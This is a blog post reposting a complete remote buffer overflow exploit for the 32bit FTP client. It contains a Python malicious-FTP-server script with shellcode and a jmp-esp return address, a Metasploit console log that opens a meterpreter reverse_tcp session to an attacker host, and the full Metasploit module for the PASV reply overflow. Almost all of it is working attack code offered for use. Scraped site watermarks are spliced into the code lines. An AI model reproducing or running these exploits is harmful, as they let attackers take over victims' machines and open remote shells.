Chinaunix首页 | 论坛 | 博客
  • 博客访问: 217410
  • 博文数量: 88
  • 博客积分: 3020
  • 博客等级: 中校
  • 技术积分: 707
  • 用 户 组: 普通用户
  • 注册时间: 2009-02-12 16:56
文章分类
文章存档

2010年(26)

2009年(62)

我的朋友

分类: 网络与安全

2009-06-23 15:38:50

#!/usr/bin/python
# _ _ _ __ _ _ _
#| || | (_) ___ / \ | |__ | | |
#| __ | | | (_-< | () | | / / |_ _|
#|_||_| |_| /__/ \__/ |_\_\ |_|
#
#[*] Bug : 32bit FTP (09.04.24) (CWD response) Remote Buffer Overflow Exploit
#[*] Refer :
#[*] Tested on : Xp sp3 (EN)(VB)
#[*] Exploited by : His0k4
#[*] Greetings : All friends & muslims HaCkErs (DZ),Algerians Elites,snakespc.com
#[*] Serra7 Merra7 koulchi mderra7 :p

from socket import *

payload = "\x41"*1020
payload += "\x67\x86\x86\x7C" # jmp esp kernel32.dll

# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum
payload += (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x54\x4e\x53\x4b\x38\x4e\x47"
"\x45\x30\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x58"
"\x4f\x45\x42\x32\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x43\x4b\x38"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x35\x46\x42\x46\x30\x45\x37\x45\x4e\x4b\x58"
"\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x54"
"\x4b\x38\x4f\x35\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x31\x4b\x58"
"\x41\x50\x4b\x4e\x49\x38\x4e\x35\x46\x52\x46\x30\x43\x4c\x41\x43"
"\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x43\x45\x48\x42\x4c\x4a\x47"
"\x4e\x50\x4b\x48\x42\x34\x4e\x30\x4b\x48\x42\x47\x4e\x51\x4d\x4a"
"\x4b\x38\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b"
"\x42\x30\x42\x30\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x55\x41\x43"
"\x48\x4f\x42\x46\x48\x55\x49\x58\x4a\x4f\x43\x58\x42\x4c\x4b\x37"
"\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x46\x4a\x59"
"\x50\x4f\x4c\x58\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x56\x41\x56"
"\x4e\x56\x43\x36\x42\x30\x5a")

s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 21))
s.listen(1)
print "[+] Listening on [FTP] 21"
c, addr = s.accept()

print "[+] Connection accepted from: %s" % (addr[0])

c.send("220 Hello\r\n")
c.recv(1024)
c.send("331 pwd please\r\n")
c.recv(1024)
c.send("230 OK\r\n")
c.recv(1024)
c.send("250 CWD command successful.\r\n")
c.recv(1024)
c.send("257 "+payload+" is current directory.")
c.close()
raw_input("[+] Done, press enter to quit")
s.close()



metasploit的使用方法:

#msf > use exploit/windows/ftp/32bitftp_pasv_reply
#msf exploit(32bitftp_pasv) > set PAYLOAD windows/meterpreter/reverse_tcp
#PAYLOAD => windows/meterpreter/reverse_tcp                              
#msf exploit(32bitftp_pasv) > set LHOST 192.168.1.2
#LHOST => 192.168.1.2                              
#msf exploit(32bitftp_pasv) > exploit              
#[*] Exploit running as background job.            
#msf exploit(32bitftp_pasv) >                      


#[*] Handler binding to LHOST 0.0.0.0              
#[*] Started reverse handler                       
#[*] Server started.   
# Victim connecting to the malicious ftp server.                           
#[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
#[*] Sending stage (2650 bytes)                                        
#[*] Sleeping before handling stage...                                  网管网bitsCN_com
#[*] Uploading DLL (75787 bytes)...                                    
#[*] Upload completed.                                                 
#[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.3:1137)

##
# $Id: 32bitftp_pasv_reply.rb 6528 2009-05-06 16:00:00Z  $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# /framework/


class Metasploit3 < Msf::Exploit::Remote 

 include Msf::Exploit::Remote::TcpServer 

 def initialize(info = {})
  super(update_info(info,
   'Name'           => '32bit FTP (PASV) Reply Client Remote overflow Exploit',
   'Description'    => %q{
    This module exploits a buffer overflow in the 32bit FTP 09.04.24
    client that is triggered through an excessively long PASV reply command
   },
   'Author'   => [ 'His0k4 ' ],
   'License'        => MSF_LICENSE,
   'Version'        => '$Revision: 6528 $',
   'References'     =>
    [
     [ 'URL', '' ],
     [ 'BID', '34838' ],

    ],
   'Payload'        =>
    {
     'Space'    => 1000,
     'BadChars' => "\x00\x0a\x0d\x20",
     'EncoderType'   => Msf::Encoder::Type::AlphanumMixed,
     'StackAdjustment' => -3500,
    },
   'Platform'       => 'win',
   'Targets'        =>
    [
    # Tested against xp SP3 english
     [ 'Windows XP SP3 English', { 'Ret' => 0x7c868667 } ], # jmp esp kernel32.dll
     [ 'Windows XP SP2 French', { 'Ret' => 0x7C82385D } ], # call esp kernel32.dll
    ],
   'Privileged'     => false,
   'DisclosureDate' => 'Mai 06 2009',
   'DefaultTarget'  => 0)) 54com.cn

  register_options(
   [
    OptPort.new('SRVPORT', [ true, "The FTP daemon port to listen on", 21 ]),
    OptString.new('SRVNAME', [ true, "Welcome to the ... FTP Service", "Test" ]),
   ], self.class)

 def on_client_connect(client)
  return if ((p = regenerate_payload(client)) == nil) 


  buffer = "220 Welcome to the " + datastore['SRVNAME'] + " FTP Service.\r\n"
  client.put(buffer)
 end
 
 def on_client_data(client)
 
 
  client.get_once


  user = "331 Please specify the password.\r\n"
  client.put(user)
  
  client.get_once
  pass = "230 Login successful.\r\n"
  client.put(pass)
  
  client.get_once
  pwd = "257 \"/\"\r\n"
  client.put(pwd)
  
  client.get_once
  type = "200 Switching to ASCII mode.\r\n"
  client.put(type)
    
  client.get_once
  pasv = "227 Entering Passive Mode ("
  pasv << rand_text_numeric(966)
  pasv << [target.ret].pack('V')
  pasv << make_nops(20)
  pasv << payload.encoded
  pasv << ")\r\n"
  
  client.put(pasv)
  
  handler(client)
  service.close_client(client)
 end
end

阅读(841) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~